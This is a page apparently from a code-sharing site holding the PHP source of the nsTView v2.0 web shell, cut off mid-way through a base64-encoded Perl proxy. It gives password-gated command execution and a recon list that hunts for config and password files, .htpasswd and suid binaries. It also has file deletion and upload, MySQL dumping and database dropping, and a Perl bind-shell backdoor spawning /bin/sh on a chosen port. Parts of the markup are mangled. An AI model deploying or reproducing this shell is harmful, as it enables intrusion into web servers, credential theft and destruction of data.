qema
— Uploaded Nov 2, 2009Summary: qema2
<? @session_start(); @set_time_limit(0); @set_magic_quotes_runtime(0); @error_reporting(0); #####cfg##### # use password true / false # $create_password = true; $password = "fares1"; // default password for nstview, you can change it. # UNIX COMMANDS # description (nst) command # example: Shutdown (nst) shutdown -h now $fast_commands = " Show open ports (nst) netstat -an | grep LISTEN | grep tcp last root (nst) last root last (all users) (nst) last all Find all config.php in / (nst) find / -type f -name config.php Find all config.php in . (nst) find . -type f -name config.php Find all admin.php in / (nst) find / -type f -name admin.php Find all admin.php in . (nst) find . -type f -name admin.php Find all config.inc.php in / (nst) find / -type f -name config.inc.php Find all config.inc.php in . (nst) find . -type f -name config.inc.php Find all config.inc in / (nst) find / -type f -name config.inc Find all config.inc in . (nst) find . -type f -name config.inc Find all config.dat in / (nst) find / -type f -name config.dat Find all config.dat in . (nst) find . -type f -name config.dat Find all config* in / (nst) find / -type f -name config* Find all config* in . (nst) find . -type f -name config* Find all pass* in / (nst) find / -type f -name pass* Find all pass* in . (nst) find . -type f -name pass* Find all .bash_history in / (nst) find / -type f -name .bash_history Find all .bash_history in . (nst) find . -type f -name .bash_history Find all .htpasswd in / (nst) find / -type f -name .htpasswd Find all .htpasswd in . (nst) find . -type f -name .htpasswd Find all writable dirs/files in / (nst) find / -perm -2 -ls Find all writable dirs/files in . (nst) find . -perm -2 -ls Find all suid files in / (nst) find / -type f -perm -04000 -ls Find all suid files in . (nst) find . -type f -perm -04000 -ls Find all sgid files in / (nst) find / -type f -perm -02000 -ls Find all sgid files in . (nst) find . -type f -perm -02000 -ls Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc OS Version? (nst) sysctl -a | grep version Kernel version? (nst) cat /proc/version cat syslog.conf (nst) cat /etc/syslog.conf Cat - Message of the day (nst) cat /etc/motd Cat hosts (nst) cat /etc/hosts Distrib name (nst) cat /etc/issue.net Distrib name (2) (nst) cat /etc/*-realise Display all process - wide output (nst) ps auxw Display all your process (nst) ps ux Interfaces (nst) ifconfig CPU? (nst) cat /proc/cpuinfo RAM (nst) free -m HDD space (nst) df -h List of Attributes (nst) lsattr -a Mount options (nst) cat /etc/fstab Is cURL installed? (nst) which curl Is wGET installed? (nst) which wget Is lynx installed? (nst) which lynx Is links installed? (nst) which links Is fetch installed? (nst) which fetch Is GET installed? (nst) which GET Is perl installed? (nst) which perl Where is apache (nst) whereis apache Where is perl (nst) whereis perl locate proftpd.conf (nst) locate proftpd.conf locate httpd.conf (nst) locate httpd.conf locate my.conf (nst) locate my.conf locate psybnc.conf (nst) locate psybnc.conf "; # WINDOWS COMMANDS # description (nst) command # example: Delete autoexec.bat (nst) del c:\autoexec.bat $fast_commands_win = " OS Version (nst) ver Tasklist (nst) tasklist Attributes in . (nst) attrib Show open ports (nst) netstat -an "; ######ver#### $ver= "v2.0"; ############# $pass=$_POST['pass']; if($pass==$password){ $_SESSION['nst']="$pass"; } if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"]; else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"]; else $ip = $_SERVER['REMOTE_ADDR']; $ip=htmlspecialchars($ip); if($create_password==true){ if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){ die(" <title>nsTView $ver:: nst.void.ru</title><center><table bordercolor="black" border="1" bgcolor="#D7FFA8" width="100"><tr><td><font size="1" face="verdana"><center><b>nsTView $ver :: <a href="http://nst.void.ru" style="text-decoration:none;"><font color="black">nst.void.ru</font></a><br /></b></center><form method="post"> Password:<br /><input name="pass" size="30" type="password" tabindex="1" /></form><b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br /><b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br /><b>Your ip:</b> ".$ip." </font></td></tr></table> ");} } $d=$_GET['d']; function adds($editf){ #if(get_magic_quotes_gpc()==0){ $editf=addslashes($editf); #} return $editf; } function adds2($editf){ if(get_magic_quotes_gpc()==0){ $editf=addslashes($editf); } return $editf; } $f = "nst_sql.txt"; $f_d = $_GET['f_d']; if($_GET['download']){ $download=$_GET['download']; header("Content-disposition: attachment; filename=\"$download\";"); readfile("$d/$download"); exit;} if($_GET['dump_download']){ header("Content-disposition: attachment; filename=\"$f\";"); header("Content-length: ".filesize($f_d."/".$f)); header("Expires: 0"); readfile($f_d."/".$f); if(is_writable($f_d."/".$f)){ unlink($f_d."/".$f); } die; } $images=array(".gif",".jpg",".png",".bmp",".jpeg"); $whereme=getcwd(); @$d=@$_GET['d']; $copyr = "<center><a href="http://nst.void.ru" target="_blank">nsTView $ver<br />o... Network security team ...o</a>"; $php_self=@$_SERVER['PHP_SELF']; if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} if(!isset($d)){$d=$whereme;} $d=str_replace("\\","/",$d); if(@$_GET['p']=="info"){ @phpinfo(); exit;} if(@$_GET['img']=="1"){ @$e=$_GET['e']; header("Content-type: image/gif"); readfile("$d/$e"); } if(@$_GET['getdb']=="1"){ header('Content-type: application/plain-text'); header('Content-Disposition: attachment; filename=nst-mysql-damp.htm'); } print "<title>nsT View $ver</title><style> BODY, TD, TR { text-decoration: none; font-family: Verdana; font-size: 8pt; SCROLLBAR-FACE-COLOR: #363d4e; SCROLLBAR-HIGHLIGHT-COLOR: #363d4e; SCROLLBAR-SHADOW-COLOR: #363d4e; SCROLLBAR-ARROW-COLOR: #363d4e; SCROLLBAR-TRACK-COLOR: #91AAFF } input, textarea, select { font-family: Verdana; font-size: 10px; color: black; background-color: white; border: solid 1px; border-color: black } UNKNOWN { COLOR: #0006DE; TEXT-DECORATION: none } A:link { COLOR: #0006DE; TEXT-DECORATION: none } A:hover { COLOR: #FF0C0B; TEXT-DECORATION: none } A:active { COLOR: #0006DE; TEXT-DECORATION: none } A:visited { TEXT-DECORATION: none } </style><script> function ShowOrHide(d1, d2) { if (d1 != '') DoDiv(d1); if (d2 != '') DoDiv(d2);} function DoDiv(id) { var item = null; if (document.getElementById) { item = document.getElementById(id); } else if (document.all){ item = document.all[id]; } else if (document.layers){ item = document.layers[id];} if (!item) {} else if (item.style) { if (item.style.display == \"none\"){ item.style.display = \"\"; } else {item.style.display = \"none\"; } }else{ item.visibility = \"show\"; }} function cwd(text){ document.shellForm.sh.value+=\" \"+ text; document.shellForm.sh.focus(); } </script> "; print "<body vlink="#0006DE"><table cellspacing="1" border="0" align="center" bgcolor="#D7FFA8" cellpadding="0" width="600"><tr><td><font size="2" face="wingdings">0</font>"; $expl=explode("/",$d); $coun=count($expl); if($os=="unix"){echo "<a href="$php_self?d=/">/</a>";} else{ echo "<a href="$php_self?d=$expl[0]">$expl[0]/</a>";} for($i=1; $i<$coun; $i++){ @$xx.=$expl[$i]."/"; $sls="<a href="$php_self?d=$expl[0]/$xx">$expl[$i]</a>/"; $sls=str_replace("//","/",$sls); $sls=str_replace("/'>/","/'>",$sls); print $sls; } if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";} if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";} echo "</td></tr>"; if($os=="unix"){ echo " <tr><td><b>id:</b> ".@exec('id')."</td></tr><tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo" <tr><td><b>Your IP: [<font color="#5F3CC1">$ip</font>] Server IP: [<font color="#5F3CC1">".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href="#" title="Host.Domain">H.D.</a>: [<font color="#5F3CC1">".$_SERVER["HTTP_HOST"]."</font>]</b><br /> [<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br /> [<a href="#" onclick="location.href=\\"javascript:history.back(-1)\">Back</a>] [<a href="$php_self">Home</a>] [<a href="$php_self?d=$d&shell=1">Shell (1)</a><a href="$php_self?d=$d&shell=2">(2)</a>] [<a href="$php_self?d=$d&t=upload">Upload</a>] [<a href="$php_self?t=tools">Tools</a>] [<a href="$php_self?p=info">PHPinfo</a>] [<a href="$php_self?delfolder=$d&d=$d&delfl=1&rback=$d" title="$d">DEL Folder</a>] [<a href="$php_self?p=sql">SQL</a>] [<a href="$php_self?p=selfremover">Self Remover</a>] </td></tr> "; if($os=="win"){ echo " <tr><td bgcolor="white"><center><font size="2" face="wingdings"><</font><a href="$php_self?d=a:/">A</a><a href="$php_self?d=b:/">B</a><a href="$php_self?d=c:/">C</a><a href="$php_self?d=d:/">D</a><a href="$php_self?d=e:/">E</a><a href="$php_self?d=f:/">F</a><a href="$php_self?d=g:/">G</a><a href="$php_self?d=h:/">H</a><a href="$php_self?d=i:/">I</a><a href="$php_self?d=j:/">J</a><a href="$php_self?d=k:/">K</a><a href="$php_self?d=l:/">L</a><a href="$php_self?d=m:/">M</a><a href="$php_self?d=n:/">N</a><a href="$php_self?d=o:/">O</a><a href="$php_self?d=p:/">P</a><a href="$php_self?d=q:/">Q</a><a href="$php_self?d=r:/">R</a><a href="$php_self?d=s:/">S</a><a href="$php_self?d=t:/">T</a><a href="$php_self?d=u:/">U</a><a href="$php_self?d=v:/">V</a><a href="$php_self?d=w:/">W</a><a href="$php_self?d=x:/">X</a><a href="$php_self?d=y:/">Y</a><a href="$php_self?d=z:/">Z</a></center></td></tr>";}else{echo "<tr><td> </td></tr>";} print "<tr><td> :: <a href="$php_self?d=$d&mkdir=1">Create folder</a> :: <a href="$php_self?d=$d&mkfile=1">Create file</a> :: <a href="$php_self?d=$d&read_file_safe_mode=1">Read file if safe mode is On</a> :: <a href="$php_self?d=$d&ps_table=1">PS table</a> :: </td></tr>"; if(@$_GET['p']=="sql"){ print "<tr><td>"; ### $f_d = $_GET['f_d']; if(!isset($f_d)){$f_d=".";} if($f_d==""){$f_d=".";} $php_self=$_SERVER['PHP_SELF']; $delete_table=$_GET['delete_table']; $tbl=$_GET['tbl']; $from=$_GET['from']; $to=$_GET['to']; $adress=$_POST['adress']; $port=$_POST['port']; $login=$_POST['login']; $pass=$_POST['pass']; $adress=$_GET['adress']; $port=$_GET['port']; $login=$_GET['login']; $pass=$_GET['pass']; $conn=$_GET['conn']; if(!isset($adress)){$adress="127.0.0.1";} if(!isset($login)){$login="root";} if(!isset($pass)){$pass="";} if(!isset($port)){$port="3306";} if(!isset($from)){$from=0;} if(!isset($to)){$to=50;} ?> <style> table,td{ color: black; font-face: verdana; font-size: 11px; } </style><font> <? if(!$conn){ ?> <!-- table 1 -->| Address: | <form><input /><input /></form> |
| Login: | <input /> |
| Pass: | <input /><input /> |
| <input /> | |
| <? if($conn){ echo "<b>PHP v".@phpversion()."<br />mySQL v".@mysql_get_server_info()."<br />";}?> |
"; }else{ print "[D][R]<font>[$records[0]]</font>$str[0]
"; } mysql_free_result($c); $total_t++; } print "
<font>Total tables: $total_t</font>"; print "
";
for($i=0; $i<$s4ot+10; $i++){print " ";}
print "</pre>";
} #end baza
# delete table
if(isset($delete_table)){
mysql_select_db($_GET['db']) or die("<font color="red">".mysql_error()."</font>");
mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color="red">".mysql_error()."</font>");
print "<br /><b><font color="green">Table [ $delete_table ] :: Deleted success!</font></b>";
print "<meta content="\\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\" http-equiv="\\"REFRESH\" />";
}
# end of delete table
# delete database
if(isset($_GET['delete_db'])){
mysql_drop_db($_GET['delete_db']) or die("<font color="red">".mysql_error()."</font>");
print "<br /><b></b><font color="green">Database ".$_GET['delete_db']." :: Deleted Success!";
print "<meta content="\\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\" http-equiv="\\"REFRESH\" />";
}
# end of delete database
# delete row
if(isset($_POST['delete_row'])){
$_POST['delete_row'] = base64_decode($_POST['delete_row']);
mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color="red">".mysql_error()."</font>");
$del_result = "<br /></font><b></b><font color="green">Deleted Success!<br />".$_POST['delete_row'];
print "<meta content="\\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=\".$_GET['vn'].\"&db=$db&tbl=$tbl\" http-equiv="\\"REFRESH\" />";
}
# end of delete row
$vn=$_GET['vn'];
print "</font></td></tr><td valign="top">";
print "<font color="green">Database: $db => $vn</font>";
# edit row
if(isset($_POST['edit_row'])){
$edit_row=base64_decode($_POST['edit_row']);
$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color="red">".mysql_error()."</font>");
print "<br /><br /><table cellspacing="1" border="0" cellpadding="1"><tr><td><b>Row</b></td><td><b>Value</b></td></tr>";
print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
print "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
print " <input name="upd" checked type="radio" value="update" />Update<br /><input name="upd" type="radio" value="insert" />Insert new<br /><br />";
$i=0;
while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
foreach($mn as $key =>$val){
$type = mysql_field_type($r_edit, $i);
$len = mysql_field_len($r_edit, $i);
$del .= "`$key`='".adds($val)."' AND ";
$c=strlen($val);
$val=htmlspecialchars($val, ENT_NOQUOTES);
$str=" <textarea>$val</textarea> ";
$buff .= "$key
<font>($type($len))</font> $str $expl[0]
<font>($expl[1])</font> <textarea></textarea> <input /> ";
if($_POST['mk_ins']){
preg_match_all("/(.*?)\s/i",$buff2,$matches3);
for($i=0; $i<count><count>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
fwrite($fp, $sql);
}
}
fclose($fp);
print "<meta>=1){
print "
Dump database $db";
}else{
print "
<font>Cannot dump database. No tables exists in $db db.</font>";
die;
}
if(sizeof($tabs)==0){
$res = mysql_query("SHOW TABLES FROM $db");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_row($res)){
$tabs[] .= $row[0];
}
}
}
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# nsTView.php v$ver
# Web: http://nst.void.ru
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db )
# --- eof ---
");
foreach($tabs as $tab) {
fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
$res = mysql_query("SHOW CREATE TABLE `$tab`");
$row = mysql_fetch_row($res);
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$res = mysql_query("SELECT * FROM `$tab`");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_assoc($res)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = join("', '", $values);
$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
fwrite($fp, $sql);
}}
fwrite($fp, "\r\n\r\n\r\n");
}
fclose($fp);
print "<meta><mysql_num_fields>$inside){
$buffer1 .= "`$key`='".adds($inside)."' AND ";
$b1 .= "".htmlspecialchars($inside, ENT_NOQUOTES)." ";
}
$buffer1 = substr($buffer1, 0, strlen($buffer1)-5);
$buffer1 = base64_encode($buffer1);
print "
<form>
<input />
<input>
</form><form>
<input />
<input />
</form>
\r\n";
print $b1;
print "";
unset($b1);
unset($buffer1);
}
mysql_free_result($result);
print "";
} #end vnutr
print "";
} # end $conn
### end of sql
print "";
print $copyr;
die;
}
@$p=$_GET['p'];
if(@$_GET['p']=="selfremover"){
print "Yes | No
Remove: "; $path=__FILE__; print $path; print " ?</font>
<select>"; $c=substr_count($fast_commands," (nst) "); for($i=0; $i<=$c; $i++){ $expl2=explode("\r\n",$fast_commands); $expl=explode(" (nst) ",$expl2[$i]); if(trim($expl[1])!=""){ print "<option value="\".trim($expl[1]).\"">$expl[0]</option>\r\n"; } } print "</select>
<input /></form> "; } }#end of os unix if($os=="win"){ function fastcmd(){ global $fast_commands_win; $c_f=explode("\n",$fast_commands_win); $c_f=count($c_f)-2; print " <form> Total commands: $c_f
<select>"; $c=substr_count($fast_commands_win," (nst) "); for($i=0; $i<=$c; $i++){ $expl2=explode("\r\n",$fast_commands_win); $expl=explode(" (nst) ",$expl2[$i]); if(trim($expl[1])!=""){ print "<option value="\".trim($expl[1]).\"">$expl[0]</option>\r\n"; } } print "</select>
<input /></form> "; } }#end of os win echo " </body>
pwd: "; chdir($d); echo getcwd()."
Fast cmd:
"; fastcmd(); if($os=="win"){$d=str_replace("/","\\\\",$d);} print " <count><mysql_num_fields>$col_value) { print htmlspecialchars($col_value)."
";}} mysql_free_result($result); mysql_drop_db("tmp_bd_file") or die("<font>".mysql_error()."</font>"); } print $copyr; die; }#end of read_file_safe_mode # sys $wich_f=$_GET['wich_f']; $delete=$_GET['delete']; $del_f=$_GET['del_f']; $chmod=$_GET['chmod']; $ccopy_to=$_GET['ccopy_to']; # delete if(@$_GET['del_f']){ if(!isset($delete)){ print "<font>Delete this file?</font>
$d/$wich_f
Yes / No ";} if($delete==1){ unlink($d."/".$del_f); print "File: <font>$d/$del_f DELETED!</font>
$d/$ccopy_to</font>
<form> File:
<input />
To:
<input />
<input /></form>
"; if($to_f){ @copy($wich_f,$to_f) or die("<font>Cannot copy!!! maybe folder is not writable</font>"); print "<font>Copy success!!!</font>
"; } echo $copyr; exit; } # chmod if(@$_GET['chmod']){ $perms = @fileperms($d."/".$wich_f); print "<font>CHMOD file $d/$wich_f</font>
"; $chmd=<<<html><form>
|
<input />
Now chmod is $t_total
</font>"; print "# BACK
"; } echo $copyr; exit; } # rename if(@$_GET['rename']){ print "<font>RENAME $d/$wich_f ?</font>
$wich_f
TO
<input />
<input /></form> "; @$rto=$_POST['rto']; if($rto){ $fr1=$d."/".$wich_f; $fr1=str_replace("//","/",$fr1); $to1=$d."/".$rto; $to1=str_replace("//","/",$to1); rename($fr1,$to1); print "File
$wich_f
Renamed to $rto
"; echo "<meta><$crb-1; $i++){ @$x.=$rback[$i]."/"; } echo "<meta content="\\"0;URL='$php_self?d=\".@$x.\"'\" http-equiv="\\"REFRESH\" />"; echo $copyr; exit;} if(@$_GET['t']=="tools"){ # unix if($os=="unix"){ print " <center><br /><font color="red"><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br /></font><table border="1"><tr><td align="center"><b>[Name]</b></td><td align="center"><b>[C]</b></td><td align="center"><b>[Port]</b></td><td align="center"><b>[Perl]</b></td><td align="center"><b>[Port]</b></td><td align="center"><b>[Other options, info]</b></td></tr><tr><form method="post"><td><font color="red"><b>Backdoor:</b></font></td><td><input name="c_bd" type="submit" value="Start" style="background-color:green;" /></td><td><input name="port" size="6" value="5545" /></td></form><form method="post"><td><input name="perl_bd" type="submit" value="Start" style="background-color:green;" /></td><td><input name="port" size="6" value="5551" /></td><td>none</td></form></tr><tr><form method="post"><td><font color="red"><b>Back connect:</b></font></td><td><input name="bc_c" type="submit" value="Start" style="background-color:green;" /></td><td><input name="port_c" size="6" value="5546" /></td><td><input name="port_p" type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port" size="6" value="5552" /></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr><tr><form method="post"><td><font color="red"><b>Datapipe:</b></font></td><td><input type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port_1" size="6" value="5547" /></td><td><input name="datapipe_pl" type="submit" value="Start" style="background-color:green;" /></td><td><input name="port_2" size="6" value="5553" /></td><td>other serv ip: <input name="ip" /> port: <input name="port_3" size="6" value="5051" /></td></form></tr><tr><form method="post"><td><font color="red"><b>Web proxy:</b></font></td><td><input type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port" size="6" value="5548" /></td></form><form method="post"><td><input name="perl_proxy" type="submit" value="Start" style="background-color:green;" /></td><td><input name="port" size="6" value="5554" /></td></form><td>none</td></tr><tr><form method="post"><td><font color="red"><b>Socks 4 serv:</b></font></td><td><input type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port" size="6" value="5549" /></td></form><td><input type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port" size="6" value="5555" /></td><td>none</td></tr><tr><form method="post"><td><font color="red"><b>Socks 5 serv:</b></font></td><td><input type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port" size="6" value="5550" /></td></form><td><input type="submit" value="Start" disabled style="background-color:gray;" /></td><td><input name="port" size="6" value="5556" /></td><td>none</td></tr></table></center><br /><br /> "; }#end of unix if($_POST['perl_bd']){ $port=$_POST['port']; $perl_bd_scp = " use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')); setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY)); listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);} open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\"); close X;}}"; if(is_writable("/tmp")){ $fp=fopen("/tmp/nst_perl_bd.pl","w"); fwrite($fp,"$perl_bd_scp"); passthru("perl /tmp/nst_perl_bd.pl &"); unlink("/tmp/nst_perl_bd.pl"); }else{ if(is_writable(".")){ mkdir(".nst_bd_tmp"); $fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w"); fwrite($fp,"$perl_bd_scp"); passthru("perl .nst_bd_tmp/nst_perl_bd.pl &"); unlink(".nst_bd_tmp/nst_perl_bd.pl"); rmdir(".nst_bd_tmp"); } } $show_ps="1"; }#end of start perl_bd if($_POST['perl_proxy']){ $port=$_POST['port']; $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiB